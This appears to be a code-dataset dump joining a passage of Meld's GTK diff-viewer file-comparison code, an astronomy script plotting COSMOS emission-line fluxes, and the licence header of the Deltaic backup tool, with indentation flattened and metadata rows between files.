self.popup_menu.popup(None, None, None, event.button, event.time)
return True
return False
def on_textview_toggle_overwrite(self, view):
self.textview_overwrite = not self.textview_overwrite
for v,h in zip(self.textview, self.textview_overwrite_handlers):
v.disconnect(h)
if v != view:
v.emit("toggle-overwrite")
self.textview_overwrite_handlers = [ t.connect("toggle-overwrite", self.on_textview_toggle_overwrite) for t in self.textview ]
self.on_cursor_position_changed(view.get_buffer(), None, True)
#
# text buffer loading/saving
#
def set_labels(self, lst):
assert len(lst) <= len(self.bufferdata)
for l,d in zip(lst,self.bufferdata):
if len(l): d.label = l
def set_merge_output_file(self, filename):
if len(self.bufferdata) < 2:
return
self.bufferdata[1].savefile = os.path.abspath(filename)
def recompute_label(self):
filenames = []
for i in range(self.num_panes):
filenames.append( self._get_pane_label(i) )
shortnames = misc.shorten_names(*filenames)
for i in range(self.num_panes):
stock = None
if self.bufferdata[i].modified == 1:
shortnames[i] += "*"
if self.bufferdata[i].writable == 1:
stock = gtk.STOCK_SAVE
else:
stock = gtk.STOCK_SAVE_AS
elif self.bufferdata[i].writable == 0:
stock = gtk.STOCK_NO
if stock:
self.statusimage[i].show()
self.statusimage[i].set_from_stock(stock, gtk.ICON_SIZE_BUTTON)
self.statusimage[i].set_size_request(self.diffmap[0].size_request()[0],-1)
else:
self.statusimage[i].hide()
self.label_text = " : ".join(shortnames)
self.tooltip_text = self.label_text
self.label_changed()
def set_files(self, files):
"""Set num panes to len(files) and load each file given.
If an element is None, the text of a pane is left as is.
"""
self._disconnect_buffer_handlers()
self._inline_cache = set()
for i,f in enumerate(files):
if f:
self.textbuffer[i].delete(*self.textbuffer[i].get_bounds())
absfile = os.path.abspath(f)
self.fileentry[i].set_filename(absfile)
self.fileentry[i].prepend_history(absfile)
bold, bnew = self.bufferdata[i], MeldBufferData(absfile)
if bold.filename == bnew.filename:
bnew.label = bold.label
self.bufferdata[i] = bnew
self.msgarea_mgr[i].clear()
self.recompute_label()
self.textview[len(files) >= 2].grab_focus()
self._connect_buffer_handlers()
self.scheduler.add_task( self._set_files_internal(files).next )
def _load_files(self, files, textbuffers):
self.undosequence.clear()
yield _("[%s] Set num panes") % self.label_text
self.set_num_panes( len(files) )
self._disconnect_buffer_handlers()
self.linediffer.clear()
self.queue_draw()
try_codecs = self.prefs.text_codecs.split() or ['utf_8', 'utf_16']
yield _("[%s] Opening files") % self.label_text
tasks = []
def add_dismissable_msg(pane, icon, primary, secondary):
msgarea = self.msgarea_mgr[pane].new_from_text_and_icon(
icon, primary, secondary)
button = msgarea.add_stock_button_with_text(_("Hi_de"),
gtk.STOCK_CLOSE, gtk.RESPONSE_CLOSE)
msgarea.connect("response",
lambda *args: self.msgarea_mgr[pane].clear())
msgarea.show_all()
return msgarea
for pane, filename in enumerate(files):
buf = textbuffers[pane]
if filename:
try:
handle = codecs.open(filename, "rU", try_codecs[0])
task = TaskEntry(filename, handle, buf, try_codecs[:],
pane, False)
tasks.append(task)
except (IOError, LookupError), e:
buf.delete(*buf.get_bounds())
add_dismissable_msg(pane, gtk.STOCK_DIALOG_ERROR,
_("Could not read file"), str(e))
yield _("[%s] Reading files") % self.label_text
while len(tasks):
for t in tasks[:]:
try:
nextbit = t.file.read(4096)
if nextbit.find("\x00") != -1:
t.buf.delete(*t.buf.get_bounds())
add_dismissable_msg(t.pane, gtk.STOCK_DIALOG_ERROR,
_("Could not read file"),
_("%s appears to be a binary file.") % t.filename)
tasks.remove(t)
except ValueError, err:
t.codec.pop(0)
if len(t.codec):
t.file = codecs.open(t.filename, "rU", t.codec[0])
t.buf.delete( t.buf.get_start_iter(), t.buf.get_end_iter() )
else:
print "codec error fallback", err
t.buf.delete(*t.buf.get_bounds())
add_dismissable_msg(t.pane, gtk.STOCK_DIALOG_ERROR,
_("Could not read file"),
_("%s is not in encodings: %s") %
(t.filename, try_codecs))
tasks.remove(t)
except IOError, ioerr:
add_dismissable_msg(t.pane, gtk.STOCK_DIALOG_ERROR,
_("Could not read file"), str(ioerr))
tasks.remove(t)
else:
# The handling here avoids inserting split CR/LF pairs into
# GtkTextBuffers; this is relevant only when universal
# newline support is unavailable or broken.
if t.was_cr:
nextbit = "\r" + nextbit
t.was_cr = False
if len(nextbit):
if nextbit[-1] == "\r" and len(nextbit) > 1:
t.was_cr = True
nextbit = nextbit[0:-1]
t.buf.insert( t.buf.get_end_iter(), nextbit )
else:
self.set_buffer_writable(t.buf, os.access(t.filename, os.W_OK))
self.bufferdata[t.pane].encoding = t.codec[0]
if hasattr(t.file, "newlines"):
self.bufferdata[t.pane].newlines = t.file.newlines
tasks.remove(t)
yield 1
for b in self.textbuffer:
self.undosequence.checkpoint(b)
def _diff_files(self):
yield _("[%s] Computing differences") % self.label_text
texts = self.buffer_filtered[:self.num_panes]
step = self.linediffer.set_sequences_iter(texts)
while step.next() is None:
yield 1
chunk, prev, next = self.linediffer.locate_chunk(1, 0)
self.cursor.next = chunk
if self.cursor.next is None:
self.cursor.next = next
for buf in self.textbuffer:
buf.place_cursor(buf.get_start_iter())
self.scheduler.add_task(lambda: self.next_diff(gtk.gdk.SCROLL_DOWN), True)
self.queue_draw()
self.update_highlighting()
self._connect_buffer_handlers()
self._set_merge_action_sensitivity()
langs = []
for i in range(self.num_panes):
filename = self.bufferdata[i].filename
if filename:
langs.append(srcviewer.get_language_from_file(filename))
else:
langs.append(None)
# If we have only one identified language then we assume that all of
# the files are actually of that type.
real_langs = [l for l in langs if l]
if real_langs and real_langs.count(real_langs[0]) == len(real_langs):
langs = (real_langs[0],) * len(langs)
for i in range(self.num_panes):
srcviewer.set_language(self.textbuffer[i], langs[i])
srcviewer.set_highlight_syntax(self.textbuffer[i],
self.prefs.use_syntax_highlighting)
yield 0
def _set_files_internal(self, files):
for i in self._load_files(files, self.textbuffer):
yield i
for i in self._diff_files():
yield i
def refresh_comparison(self):
"""Refresh the view by clearing and redoing all comparisons"""
self._disconnect_buffer_handlers()
self._inline_cache = set()
self.linediffer.clear()
self.queue_draw()
self.scheduler.add_task(self._diff_files().next)
def _set_merge_action_sensitivity(self):
pane = self._get_focused_pane()
editable = self.textview[pane].get_editable()
mergeable = self.linediffer.has_mergeable_changes(pane)
self.actiongroup.get_action("MergeFromLeft").set_sensitive(mergeable[0] and editable)
self.actiongroup.get_action("MergeFromRight").set_sensitive(mergeable[1] and editable)
if self.num_panes == 3 and self.textview[1].get_editable():
mergeable = self.linediffer.has_mergeable_changes(1)
else:
mergeable = (False, False)
self.actiongroup.get_action("MergeAll").set_sensitive(mergeable[0] or mergeable[1])
def on_diffs_changed(self, linediffer):
self._set_merge_action_sensitivity()
if self.linediffer.sequences_identical():
error_message = True in [m.has_message() for m in self.msgarea_mgr]
if self.num_panes == 1 or error_message:
return
for index, mgr in enumerate(self.msgarea_mgr):
secondary_text = None
# TODO: Currently this only checks to see whether text filters
# are active, and may be altering the comparison. It would be
# better if we only showed this message if the filters *did*
# change the text in question.
active_filters = any([f.active for f in self.text_filters])
if active_filters:
secondary_text = _("Text filters are being used, and may "
"be masking differences between files. "
"Would you like to compare the "
"unfiltered files?")
msgarea = mgr.new_from_text_and_icon(gtk.STOCK_INFO,
_("Files are identical"),
secondary_text)
mgr.set_msg_id(FileDiff.MSG_SAME)
button = msgarea.add_stock_button_with_text(_("Hide"),
gtk.STOCK_CLOSE,
gtk.RESPONSE_CLOSE)
if index == 0:
button.props.label = _("Hi_de")
if active_filters:
msgarea.add_button(_("Show without filters"),
gtk.RESPONSE_OK)
msgarea.connect("response", self.on_msgarea_identical_response)
msgarea.show_all()
else:
for m in self.msgarea_mgr:
if m.get_msg_id() == FileDiff.MSG_SAME:
m.clear()
def on_msgarea_identical_response(self, msgarea, respid):
for mgr in self.msgarea_mgr:
mgr.clear()
if respid == gtk.RESPONSE_OK:
self.text_filters = []
self.refresh_comparison()
def update_highlighting(self):
if not self.undosequence.in_grouped_action():
self.scheduler.add_task(self._update_highlighting().next)
def _update_highlighting(self):
alltexts = self.buffer_texts
alltags = [b.get_tag_table().lookup("inline") for b in self.textbuffer]
progress = [b.create_mark("progress", b.get_start_iter()) for b in self.textbuffer]
newcache = set()
for chunk in self.linediffer.all_changes():
for i,c in enumerate(chunk):
if c and c[0] == "replace":
bufs = self.textbuffer[1], self.textbuffer[i*2]
tags = alltags[1], alltags[i*2]
cacheitem = (i, c, tuple(alltexts[1][c[1]:c[2]]), tuple(alltexts[i*2][c[3]:c[4]]))
newcache.add(cacheitem)
# Clean interim chunks
starts = [get_iter_at_line_or_eof(b, l) for b, l in zip(bufs, (c[1], c[3]))]
prog_it0 = bufs[0].get_iter_at_mark(progress[1])
prog_it1 = bufs[1].get_iter_at_mark(progress[i * 2])
bufs[0].remove_tag(tags[0], prog_it0, starts[0])
bufs[1].remove_tag(tags[1], prog_it1, starts[1])
bufs[0].move_mark(progress[1], get_iter_at_line_or_eof(bufs[0], c[2]))
bufs[1].move_mark(progress[i * 2], get_iter_at_line_or_eof(bufs[1], c[4]))
if cacheitem in self._inline_cache:
continue
ends = [get_iter_at_line_or_eof(b, l) for b, l in zip(bufs, (c[2], c[4]))]
bufs[0].remove_tag(tags[0], starts[0], ends[0])
bufs[1].remove_tag(tags[1], starts[1], ends[1])
# We don't use self.buffer_texts here, as removing line
# breaks messes with inline highlighting in CRLF cases
text1 = bufs[0].get_text(starts[0], ends[0], False)
text1 = unicode(text1, 'utf8')
textn = bufs[1].get_text(starts[1], ends[1], False)
textn = unicode(textn, 'utf8')
# For very long sequences, bail rather than trying a very slow comparison
inline_limit = 8000 # arbitrary constant
if len(text1) + len(textn) > inline_limit:
for i in range(2):
bufs[i].apply_tag(tags[i], starts[i], ends[i])
continue
#print "<<<\n%s\n---\n%s\n>>>" % (text1, textn)
back = (0,0)
for o in self._cached_match(text1, textn):
if o[0] == "equal":
if (o[2]-o[1] < 3) or (o[4]-o[3] < 3):
back = o[4]-o[3], o[2]-o[1]
continue
for i in range(2):
s,e = starts[i].copy(), starts[i].copy()
s.forward_chars( o[1+2*i] - back[i] )
e.forward_chars( o[2+2*i] )
bufs[i].apply_tag(tags[i], s, e)
back = (0,0)
yield 1
# Clean up trailing lines
prog_it = [b.get_iter_at_mark(p) for b, p in zip(self.textbuffer, progress)]
for b, tag, start in zip(self.textbuffer, alltags, prog_it):
b.remove_tag(tag, start, b.get_end_iter())
self._inline_cache = newcache
self._cached_match.clean(len(self._inline_cache))
def on_textview_expose_event(self, textview, event):
if self.num_panes == 1:
return
if event.window != textview.get_window(gtk.TEXT_WINDOW_TEXT) \
and event.window != textview.get_window(gtk.TEXT_WINDOW_LEFT):
return
# Hack to redraw the line number gutter used by post-2.10 GtkSourceView
if event.window == textview.get_window(gtk.TEXT_WINDOW_LEFT) and \
self.in_nested_textview_gutter_expose:
self.in_nested_textview_gutter_expose = False
return
visible = textview.get_visible_rect()
pane = self.textview.index(textview)
area = event.area
x, y = textview.window_to_buffer_coords(gtk.TEXT_WINDOW_WIDGET,
area.x, area.y)
bounds = (textview.get_line_num_for_y(y),
textview.get_line_num_for_y(y + area.height + 1))
width, height = textview.allocation.width, textview.allocation.height
context = event.window.cairo_create()
context.rectangle(area.x, area.y, area.width, area.height)
context.clip()
context.set_line_width(1.0)
for change in self.linediffer.single_changes(pane, bounds):
ypos0 = textview.get_y_for_line_num(change[1]) - visible.y
ypos1 = textview.get_y_for_line_num(change[2]) - visible.y
context.rectangle(-0.5, ypos0 - 0.5, width + 1, ypos1 - ypos0)
if change[1] != change[2]:
context.set_source_rgb(*self.fill_colors[change[0]])
context.fill_preserve()
if self.linediffer.locate_chunk(pane, change[1])[0] == self.cursor.chunk:
context.set_source_rgba(1.0, 1.0, 1.0, 0.5)
context.fill_preserve()
context.set_source_rgb(*self.line_colors[change[0]])
context.stroke()
if textview.is_focus() and self.cursor.line is not None:
it = self.textbuffer[pane].get_iter_at_line(self.cursor.line)
ypos, line_height = self.textview[pane].get_line_yrange(it)
context.set_source_rgba(1, 1, 0, .25)
context.rectangle(0, ypos - visible.y, width, line_height)
context.fill()
current_time = glib.get_current_time()
new_anim_chunks = []
for c in self.animating_chunks[pane]:
percent = min(1.0, (current_time - c.start_time) / c.duration)
rgba_pairs = zip(c.start_rgba, c.end_rgba)
rgba = [s + (e - s) * percent for s, e in rgba_pairs]
it = self.textbuffer[pane].get_iter_at_mark(c.start_mark)
ystart, _ = self.textview[pane].get_line_yrange(it)
it = self.textbuffer[pane].get_iter_at_mark(c.end_mark)
yend, _ = self.textview[pane].get_line_yrange(it)
if ystart == yend:
ystart -= 1
context.set_source_rgba(*rgba)
context.rectangle(0, ystart - visible.y, width, yend - ystart)
context.fill()
if current_time <= c.start_time + c.duration:
new_anim_chunks.append(c)
else:
self.textbuffer[pane].delete_mark(c.start_mark)
self.textbuffer[pane].delete_mark(c.end_mark)
self.animating_chunks[pane] = new_anim_chunks
if self.animating_chunks[pane] and self.anim_source_id[pane] is None:
def anim_cb():
textview.queue_draw()
return True
# Using timeout_add interferes with recalculation of inline
# highlighting; this mechanism could be improved.
self.anim_source_id[pane] = gobject.idle_add(anim_cb)
elif not self.animating_chunks[pane] and self.anim_source_id[pane]:
gobject.source_remove(self.anim_source_id[pane])
self.anim_source_id[pane] = None
if event.window == textview.get_window(gtk.TEXT_WINDOW_LEFT):
self.in_nested_textview_gutter_expose = True
textview.emit("expose-event", event)
def _get_filename_for_saving(self, title ):
dialog = gtk.FileChooserDialog(title,
parent=self.widget.get_toplevel(),
action=gtk.FILE_CHOOSER_ACTION_SAVE,
buttons = (gtk.STOCK_CANCEL, gtk.RESPONSE_CANCEL, gtk.STOCK_OK, gtk.RESPONSE_OK) )
dialog.set_default_response(gtk.RESPONSE_OK)
response = dialog.run()
filename = None
if response == gtk.RESPONSE_OK:
filename = dialog.get_filename()
dialog.destroy()
if filename:
if os.path.exists(filename):
response = misc.run_dialog(
_('"%s" exists!\nOverwrite?') % os.path.basename(filename),
parent = self,
buttonstype = gtk.BUTTONS_YES_NO)
if response == gtk.RESPONSE_NO:
return None
return filename
return None
def _save_text_to_filename(self, filename, text):
try:
open(filename, "wb").write(text)
except IOError, e:
misc.run_dialog(
_("Error writing to %s\n\n%s.") % (filename, e),
self, gtk.MESSAGE_ERROR, gtk.BUTTONS_OK)
return False
return True
def save_file(self, pane, saveas=0):
buf = self.textbuffer[pane]
bufdata = self.bufferdata[pane]
if saveas or not bufdata.filename:
filename = self._get_filename_for_saving( _("Choose a name for buffer %i.") % (pane+1) )
if filename:
bufdata.filename = bufdata.label = os.path.abspath(filename)
self.fileentry[pane].set_filename( bufdata.filename)
self.fileentry[pane].prepend_history(bufdata.filename)
else:
return False
start, end = buf.get_bounds()
text = unicode(buf.get_text(start, end, False), 'utf8')
if bufdata.newlines:
if type(bufdata.newlines) == type(""):
if(bufdata.newlines) != '\n':
text = text.replace("\n", bufdata.newlines)
elif type(bufdata.newlines) == type(()):
buttons = {'\n':("UNIX (LF)",0), '\r\n':("DOS (CR-LF)", 1), '\r':("MAC (CR)",2) }
newline = misc.run_dialog( _("This file '%s' contains a mixture of line endings.\n\nWhich format would you like to use?") % bufdata.label,
self, gtk.MESSAGE_WARNING, buttonstype=gtk.BUTTONS_CANCEL,
extrabuttons=[ buttons[b] for b in bufdata.newlines ] )
if newline < 0:
return
for k,v in buttons.items():
if v[1] == newline:
bufdata.newlines = k
if k != '\n':
text = text.replace('\n', k)
break
if bufdata.encoding:
try:
text = text.encode(bufdata.encoding)
except UnicodeEncodeError:
if misc.run_dialog(
_("'%s' contains characters not encodable with '%s'\nWould you like to save as UTF-8?") % (bufdata.label, bufdata.encoding),
self, gtk.MESSAGE_ERROR, gtk.BUTTONS_YES_NO) != gtk.RESPONSE_YES:
return False
save_to = bufdata.savefile or bufdata.filename
if self._save_text_to_filename(save_to, text):
self.emit("file-changed", save_to)
self.undosequence.checkpoint(buf)
return True
else:
return False
def make_patch(self, *extra):
dialog = patchdialog.PatchDialog(self)
dialog.run()
def set_buffer_writable(self, buf, yesno):
pane = self.textbuffer.index(buf)
self.bufferdata[pane].writable = yesno
self.recompute_label()
def set_buffer_modified(self, buf, yesno):
pane = self.textbuffer.index(buf)
self.bufferdata[pane].modified = yesno
self.recompute_label()
def save(self):
pane = self._get_focused_pane()
if pane >= 0:
self.save_file(pane)
def save_as(self):
pane = self._get_focused_pane()
if pane >= 0:
self.save_file(pane, True)
def save_all(self):
for i in range(self.num_panes):
if self.bufferdata[i].modified:
self.save_file(i)
def on_fileentry_activate(self, entry):
if self.on_delete_event() != gtk.RESPONSE_CANCEL:
files = [e.get_full_path() for e in self.fileentry[:self.num_panes]]
self.set_files(files)
return 1
def _get_focused_pane(self):
for i in range(self.num_panes):
if self.textview[i].is_focus():
return i
return -1
#
# refresh and reload
#
def on_reload_activate(self, *extra):
modified = [os.path.basename(b.label) for b in self.bufferdata if b.modified]
if len(modified):
message = _("Reloading will discard changes in:\n%s\n\nYou cannot undo this operation.") % "\n".join(modified)
response = misc.run_dialog( message, parent=self, messagetype=gtk.MESSAGE_WARNING, buttonstype=gtk.BUTTONS_OK_CANCEL)
if response != gtk.RESPONSE_OK:
return
files = [b.filename for b in self.bufferdata[:self.num_panes] ]
self.set_files(files)
def on_refresh_activate(self, *extra):
self.refresh_comparison()
def queue_draw(self, junk=None):
for t in self.textview:
t.queue_draw()
for i in range(self.num_panes-1):
self.linkmap[i].queue_draw()
self.diffmap0.queue_draw()
self.diffmap1.queue_draw()
def on_action_lock_scrolling_toggled(self, action):
self.toggle_scroll_lock(action.get_active())
def on_lock_button_toggled(self, button):
self.toggle_scroll_lock(not button.get_active())
def toggle_scroll_lock(self, locked):
icon_name = "meld-locked" if locked else "meld-unlocked"
self.lock_button_image.props.icon_name = icon_name
self.lock_button.set_active(not locked)
self.actiongroup.get_action("LockScrolling").set_active(locked)
self._scroll_lock = not locked
#
# scrollbars
#
def _sync_hscroll(self, adjustment):
if self._sync_hscroll_lock or self._scroll_lock:
return
self._sync_hscroll_lock = True
val = adjustment.get_value()
for sw in self.scrolledwindow[:self.num_panes]:
adj = sw.get_hadjustment()
if adj is not adjustment:
adj.set_value(val)
self._sync_hscroll_lock = False
def _sync_vscroll(self, adjustment, master):
# only allow one scrollbar to be here at a time
if self._sync_vscroll_lock:
return
if not self._scroll_lock and (self.keymask & MASK_SHIFT) == 0:
self._sync_vscroll_lock = True
syncpoint = 0.5
# the line to search for in the 'master' text
master_y = adjustment.value + adjustment.page_size * syncpoint
it = self.textview[master].get_line_at_y(int(master_y))[0]
line_y, height = self.textview[master].get_line_yrange(it)
line = it.get_line() + ((master_y-line_y)/height)
# scrollbar influence 0->1->2 or 0<-1->2 or 0<-1<-2
scrollbar_influence = ((1, 2), (0, 2), (1, 0))
for i in scrollbar_influence[master][:self.num_panes - 1]:
adj = self.scrolledwindow[i].get_vadjustment()
mbegin, mend = 0, self.textbuffer[master].get_line_count()
obegin, oend = 0, self.textbuffer[i].get_line_count()
# look for the chunk containing 'line'
for c in self.linediffer.pair_changes(master, i):
if c[1] >= line:
mend = c[1]
oend = c[3]
break
elif c[2] >= line:
mbegin, mend = c[1], c[2]
obegin, oend = c[3], c[4]
break
else:
mbegin = c[2]
obegin = c[4]
fraction = (line - mbegin) / ((mend - mbegin) or 1)
other_line = (obegin + fraction * (oend - obegin))
it = self.textbuffer[i].get_iter_at_line(int(other_line))
val, height = self.textview[i].get_line_yrange(it)
val -= (adj.page_size) * syncpoint
val += (other_line-int(other_line)) * height
val = min(max(val, adj.lower), adj.upper - adj.page_size)
adj.set_value( val )
# If we just changed the central bar, make it the master
if i == 1:
master, line = 1, other_line
self._sync_vscroll_lock = False
for lm in self.linkmap:
if lm.window:
lm.window.invalidate_rect(None, True)
lm.window.process_updates(True)
def set_num_panes(self, n):
if n != self.num_panes and n in (1,2,3):
self.num_panes = n
toshow = self.scrolledwindow[:n] + self.fileentry[:n]
toshow += self.vbox[:n] + self.msgarea_mgr[:n]
toshow += self.linkmap[:n-1] + self.diffmap[:n]
map( lambda x: x.show(), toshow )
tohide = self.statusimage + self.scrolledwindow[n:] + self.fileentry[n:]
tohide += self.vbox[n:] + self.msgarea_mgr[n:]
tohide += self.linkmap[n-1:] + self.diffmap[n:]
map( lambda x: x.hide(), tohide )
self.actiongroup.get_action("MakePatch").set_sensitive(n > 1)
self.actiongroup.get_action("CycleDocuments").set_sensitive(n > 1)
def coords_iter(i):
buf_index = 2 if i == 1 and self.num_panes == 3 else i
get_end_iter = self.textbuffer[buf_index].get_end_iter
get_iter_at_line = self.textbuffer[buf_index].get_iter_at_line
get_line_yrange = self.textview[buf_index].get_line_yrange
def coords_by_chunk():
y, h = get_line_yrange(get_end_iter())
max_y = float(y + h)
for c in self.linediffer.single_changes(i):
y0, _ = get_line_yrange(get_iter_at_line(c[1]))
if c[1] == c[2]:
y, h = y0, 0
else:
y, h = get_line_yrange(get_iter_at_line(c[2] - 1))
yield c[0], y0 / max_y, (y + h) / max_y
return coords_by_chunk
colour_map = {
"conflict": (1.0, 0.75294117647058822, 0.79607843137254897),
"insert": (0.75686274509803919, 1.0, 0.75686274509803919),
"replace": (0.8666666666666667, 0.93333333333333335, 1.0),
"delete": (0.75686274509803919, 1.0, 0.75686274509803919)
}
for (w, i) in zip(self.diffmap, (0, self.num_panes - 1)):
scroll = self.scrolledwindow[i].get_vscrollbar()
w.setup(scroll, coords_iter(i), colour_map)
for (w, i) in zip(self.linkmap, (0, self.num_panes - 2)):
w.associate(self, self.textview[i], self.textview[i + 1])
for i in range(self.num_panes):
if self.bufferdata[i].modified:
self.statusimage[i].show()
self.queue_draw()
self.recompute_label()
def next_diff(self, direction):
pane = self._get_focused_pane()
if pane == -1:
if len(self.textview) > 1:
pane = 1
else:
pane = 0
buf = self.textbuffer[pane]
if direction == gtk.gdk.SCROLL_DOWN:
target = self.cursor.next
else: # direction == gtk.gdk.SCROLL_UP
target = self.cursor.prev
if target is None:
return
c = self.linediffer.get_chunk(target, pane)
if c:
# Warp the cursor to the first line of next chunk
if self.cursor.line != c[1]:
buf.place_cursor(buf.get_iter_at_line(c[1]))
self.textview[pane].scroll_to_mark(buf.get_insert(), 0.1)
def copy_chunk(self, src, dst, chunk, copy_up):
b0, b1 = self.textbuffer[src], self.textbuffer[dst]
start = get_iter_at_line_or_eof(b0, chunk[1])
end = get_iter_at_line_or_eof(b0, chunk[2])
t0 = unicode(b0.get_text(start, end, False), 'utf8')
if copy_up:
if chunk[2] >= b0.get_line_count() and \
chunk[3] < b1.get_line_count():
# TODO: We need to insert a linebreak here, but there is no
# way to be certain what kind of linebreak to use.
t0 = t0 + "\n"
dst_start = get_iter_at_line_or_eof(b1, chunk[3])
mark0 = b1.create_mark(None, dst_start, True)
new_end = buffer_insert(b1, chunk[3], t0)
else: # copy down
dst_start = get_iter_at_line_or_eof(b1, chunk[4])
mark0 = b1.create_mark(None, dst_start, True)
new_end = buffer_insert(b1, chunk[4], t0)
mark1 = b1.create_mark(None, new_end, True)
# FIXME: If the inserted chunk ends up being an insert chunk, then
# this animation is not visible; this happens often in three-way diffs
rgba0 = self.fill_colors['insert'] + (1.0,)
rgba1 = self.fill_colors['insert'] + (0.0,)
anim = TextviewLineAnimation(mark0, mark1, rgba0, rgba1, 0.5)
self.animating_chunks[dst].append(anim)
def replace_chunk(self, src, dst, chunk):
b0, b1 = self.textbuffer[src], self.textbuffer[dst]
src_start = get_iter_at_line_or_eof(b0, chunk[1])
src_end = get_iter_at_line_or_eof(b0, chunk[2])
dst_start = get_iter_at_line_or_eof(b1, chunk[3])
dst_end = get_iter_at_line_or_eof(b1, chunk[4])
t0 = unicode(b0.get_text(src_start, src_end, False), 'utf8')
mark0 = b1.create_mark(None, dst_start, True)
self.on_textbuffer__begin_user_action()
b1.delete(dst_start, dst_end)
new_end = buffer_insert(b1, chunk[3], t0)
self.on_textbuffer__end_user_action()
mark1 = b1.create_mark(None, new_end, True)
# FIXME: If the inserted chunk ends up being an insert chunk, then
# this animation is not visible; this happens often in three-way diffs
rgba0 = self.fill_colors['insert'] + (1.0,)
rgba1 = self.fill_colors['insert'] + (0.0,)
anim = TextviewLineAnimation(mark0, mark1, rgba0, rgba1, 0.5)
self.animating_chunks[dst].append(anim)
def delete_chunk(self, src, chunk):
b0 = self.textbuffer[src]
it = get_iter_at_line_or_eof(b0, chunk[1])
if chunk[2] >= b0.get_line_count():
it.backward_char()
b0.delete(it, get_iter_at_line_or_eof(b0, chunk[2]))
mark0 = b0.create_mark(None, it, True)
mark1 = b0.create_mark(None, it, True)
# TODO: Need a more specific colour here; conflict is wrong
rgba0 = self.fill_colors['conflict'] + (1.0,)
rgba1 = self.fill_colors['conflict'] + (0.0,)
anim = TextviewLineAnimation(mark0, mark1, rgba0, rgba1, 0.5)
self.animating_chunks[src].append(anim)
################################################################################
#
# Local Functions
#
################################################################################
class MeldBufferData(object):
__slots__ = ("modified", "writable", "filename", "savefile", "label",
"encoding", "newlines")
def __init__(self, filename=None):
self.modified = 0
self.writable = 1
self.filename = filename
self.savefile = None
self.label = filename
self.encoding = None
self.newlines = None
class BufferAction(object):
"""A helper to undo/redo text insertion/deletion into/from a text buffer"""
def __init__(self, buf, offset, text):
self.buffer = buf
self.offset = offset
self.text = text
def delete(self):
start = self.buffer.get_iter_at_offset(self.offset)
end = self.buffer.get_iter_at_offset(self.offset + len(self.text))
self.buffer.delete(start, end)
def insert(self):
start = self.buffer.get_iter_at_offset(self.offset)
self.buffer.insert(start, self.text)
class BufferInsertionAction(BufferAction):
undo = BufferAction.delete
redo = BufferAction.insert
class BufferDeletionAction(BufferAction):
undo = BufferAction.insert
redo = BufferAction.delete
| gpl-2.0 | -8,771,073,025,037,235,000 | 43.110922 | 196 | 0.56126 | false | 3.72303 | false | false | false |
brianlorenz/COSMOS_IMACS_Redshifts | PlotCodes/Plot_2_lines.py | 1 | 2780 | import numpy as np
import matplotlib.pyplot as plt
from astropy.io import ascii
import sys, os, string
import pandas as pd
from astropy.io import fits
import collections
#Folder to save the figures
figout = '/Users/blorenz/COSMOS/Reports/2018/Images/'
#The location with the file for all of our data
fluxdatapath = '/Users/blorenz/COSMOS/COSMOSData/lineflux.txt'
#File for the MAD of the difference in flux of duplicates in each line
maddatapath = '/Users/blorenz/COSMOS/COSMOSData/linemad.txt'
#Merge our data with the UVISTA catalog
#The location of the muzzin et al data:
mdatapath = '/Users/blorenz/COSMOS/muzzin_data/UVISTA_final_colors_sfrs_v4.1.dat'
#Read in the mad of the lines
mad_df = ascii.read(maddatapath).to_pandas()
#Read the datafile:
fluxdata = ascii.read(fluxdatapath).to_pandas()
#Fontsizes for plotting
axisfont = 18
ticksize = 16
titlefont = 24
legendfont = 16
textfont = 16
#Division function
def divz(X,Y):
return X/np.where(Y,Y,Y+1)*np.not_equal(Y,0)
#Plot of Haflux vs Hgflux of duplicates
l1 = sys.argv[1]
l2 = sys.argv[2]
sig = int(sys.argv[3])
minlim= 0.005
maxlim= 1000
lines = [l1,l2]
def findgoodfits(pd_df=fluxdata,lines=lines,sig=sig):
goodidxs = [(pd_df[line+'_flag'] == 0) for line in lines]
lowidxs = [(divz(pd_df[line+'_flux'],pd_df[line+'_scale']) < sig*mad_df[line+'_mad'][0]) for line in lines]
goodidx = np.logical_and.reduce(goodidxs)
lowidx = np.logical_or.reduce(lowidxs)
badflux = pd_df[np.logical_not(goodidx)]
lowflux = pd_df[np.logical_and(goodidx,lowidx)]
goodflux = pd_df[np.logical_and(goodidx,np.logical_not(lowidx))]
return goodflux,lowflux,badflux
goodflux,lowflux,badflux = findgoodfits()
yerr = mad_df[l2+'_mad'][0]
xerr = mad_df[l1+'_mad'][0]
xdata = divz(goodflux[l1+'_flux'],goodflux[l1+'_scale'])
ydata = divz(goodflux[l2+'_flux'],goodflux[l2+'_scale'])
xdatalow = divz(lowflux[l1+'_flux'],lowflux[l1+'_scale'])
ydatalow = divz(lowflux[l2+'_flux'],lowflux[l2+'_scale'])
lw=0.25
mark='.'
ms=6
fig,ax = plt.subplots(figsize=(8,7))
ax.errorbar(xdatalow,ydatalow,xerr=xerr,yerr=yerr,ls='None',lw=lw,ms=ms,color='grey',marker=mark)
ax.errorbar(xdata,ydata,xerr=xerr,yerr=yerr,ls='None',lw=lw,color='blue',ms=ms,marker=mark)
ax.plot((0,1000),(0,1000),color='black',ls='--')
#Titles, axes, legends
ax.set_title(l2+ ' Flux vs ' + l1 + ' Flux',fontsize = titlefont)
ax.legend(fontsize = legendfont)
ax.set_xlabel(l1 +' Flux ($10^{-17}$ erg/s/$cm^2$)',fontsize = axisfont)
ax.set_ylabel(l2 + ' Flux ($10^-{17}$ erg/s/$cm^2$)',fontsize = axisfont)
ax.set_xscale("log")
ax.set_yscale("log")
ax.set_xlim(minlim,maxlim)
ax.set_ylim(minlim,maxlim)
ax.tick_params(labelsize = ticksize)
plt.show()
fig.savefig(figout + 'Flux_' + l2 + '_' + l1 + '.pdf')
plt.close(fig)
| mit | -4,506,119,063,836,019,700 | 28.263158 | 111 | 0.699281 | false | 2.477718 | false | false | false |
cmusatyalab/deltaic | deltaic/sources/__init__.py | 1 | 6246 | #
# Deltaic - an efficient backup system supporting multiple data sources
#
# Copyright (c) 2014 Carnegie Mellon University
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of version 2 of the GNU General Public License as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
from datetime import datetime, date
import os
import Queue
import subprocess
import sys
